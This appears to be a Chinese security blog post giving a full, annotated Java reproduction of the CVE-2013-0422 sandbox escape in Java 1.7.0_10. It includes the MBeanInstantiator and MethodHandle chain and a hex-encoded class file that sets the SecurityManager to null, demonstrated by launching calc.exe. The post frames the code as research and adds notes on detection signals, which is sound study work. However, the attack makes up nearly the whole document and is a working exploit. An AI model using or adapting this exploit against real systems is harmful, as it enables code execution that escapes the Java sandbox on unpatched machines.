0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文
0x02 package test;
/* Java 0day 1.7.0_10 decrypted source Originally placed on https://damagelab.org/index.php?showtopic=23719&st=0 From Russia with love. */
import java.io.IOException;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.Permission;
import java.security.PermissionCollection;
import java.security.Policy;
import java.security.ProtectionDomain;
import java.util.Enumeration;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

/**
 * Local reproduction harness for CVE-2013-0422 (Java 1.7.0_10 sandbox bypass).
 *
 * <p>{@link #main} probes {@link #alert()} three times and prints a numbered
 * line for each outcome: (1-2) before any SecurityManager is installed,
 * (4-5) after {@code System.setSecurityManager(new SecurityManager())}, and
 * (6-7) after the reflective class-loading sequence has defined and
 * instantiated the class embedded in {@link #ByteArrayWithSecOff}. The
 * interesting observation is whether step 7 is still denied.
 *
 * <p>The sequence depends on two behaviours of the unpatched 1.7.0_10 runtime
 * that are visible in this file: {@code MBeanInstantiator.findClass} resolving
 * classes from the restricted {@code sun.org.mozilla.javascript.internal}
 * package for untrusted callers, and a public {@code MethodHandles.Lookup}
 * being driven through {@code invokeWithArguments} to reach
 * {@code createClassLoader}/{@code defineClass} on those classes. On a patched
 * JRE the expectation is that one of those steps throws and the outer
 * {@code catch (Throwable)} prints the stack trace, so the harness doubles as
 * a quick "is this JRE still affected" check.
 *
 * <p>Defensive notes: this only demonstrates the control-flow; the only
 * meaningful mitigation is running a patched JRE (or not exposing the JRE to
 * untrusted code at all). Child-process creation from a JVM that should be
 * sandboxed, and loads of {@code com.sun.jmx.mbeanserver} /
 * {@code sun.org.mozilla.javascript.internal} types by untrusted code, are the
 * observable signals a defender would look for.
 *
 * <p>Code-quality notes (left as-is on purpose, this is a reproduction):
 * raw {@code Class}/{@code Enumeration} types, {@code Runtime.exec(String)},
 * a {@code public static} non-final field, and {@code printStackTrace}.
 */
public class Test {
    /**
     * Prints every {@link Permission} the current {@link Policy} grants this
     * class's {@link ProtectionDomain}, one per line as {@code "<index>: <permission>"},
     * followed by {@code "the num:<count>"}.
     *
     * <p>Diagnostic only; the call in {@link #main} is commented out. Useful
     * when comparing what the sandbox grants before and after the bypass.
     */
    void checkPermission() {
        ProtectionDomain domain = this.getClass().getProtectionDomain();
        PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);
        Enumeration e = pcoll.elements();
        int i = 0;
        for (; e.hasMoreElements();) {
            Permission p = (Permission) e.nextElement();
            System.out.println(i + ": " + p);
            i++;
        }
        System.out.println("the num:" + i);
    }

    /**
     * Probe used to tell whether the installed SecurityManager blocks process
     * creation: attempts to start {@code calc.exe}.
     *
     * <p>A {@link SecurityException} from the exec check is unchecked and
     * propagates untouched, which is what the callers in {@link #main} catch.
     * Any {@link IOException} (for example on a non-Windows host where
     * {@code calc.exe} does not exist) is printed and rethrown; in
     * {@link #main} that lands in the outer {@code catch (Throwable)} and
     * aborts the run, so the probe is effectively Windows-only.
     *
     * @throws IOException if the process cannot be started
     */
    void alert() throws IOException {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            // Surface the failure, then let the caller decide (main aborts).
            e.printStackTrace();
            throw e;
        }
    }

    /**
     * Runs the three-phase probe described on the class.
     *
     * <p>Everything is wrapped in a single {@code catch (Throwable)} because
     * the reflective calls declare {@code Throwable}; any failure in the
     * bypass sequence is printed as a stack trace and the program exits
     * without reaching steps 6-7.
     *
     * @param args ignored
     */
    public static void main(String args[]) {
        try {
            // Phase 1: no SecurityManager installed, exec is expected to succeed.
            System.out.println("1.SecurityManager 开启前测试");
            Test test = new Test();
            // test.checkPermission();
            try {
                test.alert();
                System.out.println("2.成功执行 exec");
            } catch (SecurityException e) {
                System.out.println("2.you have no permission to exec");
            }
            // Phase 2: install the default SecurityManager; exec is expected to be denied.
            System.out.println("3.开启SecurityManager");
            System.setSecurityManager(new SecurityManager());
            System.out.println("4.SecurityManager 开启后测试");
            try {
                test.alert();
                System.out.println("5.成功执行 exec");
            } catch (SecurityException e) {
                System.out.println("5.you have no permission to exec");
            }
            // Phase 3: the CVE-2013-0422 sequence.
            // Decode the embedded class file (see ByteArrayWithSecOff).
            byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
            // Obtain an MBeanInstantiator via a fresh JmxMBeanServer. Its findClass
            // is the first gap: it resolves restricted-package classes that this
            // code could not reference directly under the SecurityManager.
            JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
            JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder.newMBeanServer("", null, null);
            MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
            ClassLoader a = null; // null loader argument to findClass
            Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
            Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
            // Second gap: a public Lookup is driven through invokeWithArguments so that
            // Lookup.findConstructor / Lookup.findVirtual are invoked via method handles
            // rather than called directly, evading the caller check this JRE applied
            // on the direct path.
            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
            // Handle to Lookup.findConstructor(Class, MethodType).
            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
            // Context's no-arg constructor, then a Context instance.
            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
            MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
            // Handle to Lookup.findVirtual(Class, String, MethodType).
            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
            // Context.createClassLoader(ClassLoader) -> GeneratedClassLoader, invoked with a null parent.
            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
            MethodHandle localMethodHandle4;
            localMethodHandle4 = (MethodHandle) localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
            // GeneratedClassLoader.defineClass(String, byte[]) with the decoded bytes;
            // the resulting class is defined by a trusted loader, and instantiating
            // it runs its constructor with that loader's privileges.
            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
            MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });
            Class localClass3 = (Class) localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
            localClass3.newInstance();
            // Phase 3 result: if the embedded class did its job, exec now succeeds again.
            System.out.println("6.CVE-2013-0422执行后");
            try {
                test.alert();
                System.out.println("7.成功执行 exec");
            } catch (SecurityException e) {
                System.out.println("7.you have no permission to exec");
            }
        } catch (Throwable e1) {
            // Any failure (including a patched JRE rejecting a step) ends here.
            e1.printStackTrace();
        }
    }

    /**
     * Decodes a hexadecimal string into bytes, two characters per byte.
     *
     * <p>Assumes an even-length string of valid hex digits: an odd trailing
     * character is silently dropped by the integer division, and a non-hex
     * character makes {@link Integer#parseInt} throw
     * {@link NumberFormatException}. Characters are consumed left to right,
     * so {@code "CAFE"} yields {@code {(byte)0xCA, (byte)0xFE}}.
     *
     * @param paramString hex digits, upper or lower case
     * @return the decoded bytes, length {@code paramString.length() / 2}
     * @throws NumberFormatException if a two-character pair is not valid hex
     */
    public static byte[] hex2Byte(String paramString) {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        for (int i = 0; i < arrayOfByte.length; i++) {
            arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
        }
        return arrayOfByte;
    }

    /**
     * Hex-encoded class file handed to {@code defineClass} in {@link #main}.
     *
     * <p>Readable from the bytes themselves: the {@code CAFEBABE} magic and
     * major version {@code 0x32} (Java 6 class format), a {@code SourceFile}
     * attribute of {@code B.java}, and constant-pool strings for
     * {@code java/security/AccessController}, {@code doPrivileged},
     * {@code java/security/PrivilegedExceptionAction}, {@code java/lang/System}
     * and {@code setSecurityManager}. Consistent with the field name, the
     * class appears to call {@code System.setSecurityManager} (with a null
     * argument) from inside {@code doPrivileged} when instantiated, which is
     * what re-enables exec in step 7.
     *
     * <p>Review note: this is a mutable {@code public static} field; it would
     * be {@code private static final} in anything other than a throwaway
     * reproduction.
     */
    public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"
            + "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"
            + "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"
            + "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"
            + "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"
            + "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"
            + "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"
            + "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"
            + "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"
            + "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"
            + "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"
            + "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"
            + "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"
            + "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"
            + "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"
            + "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"
            + "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"
            + "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600"
            + "0000020017";
}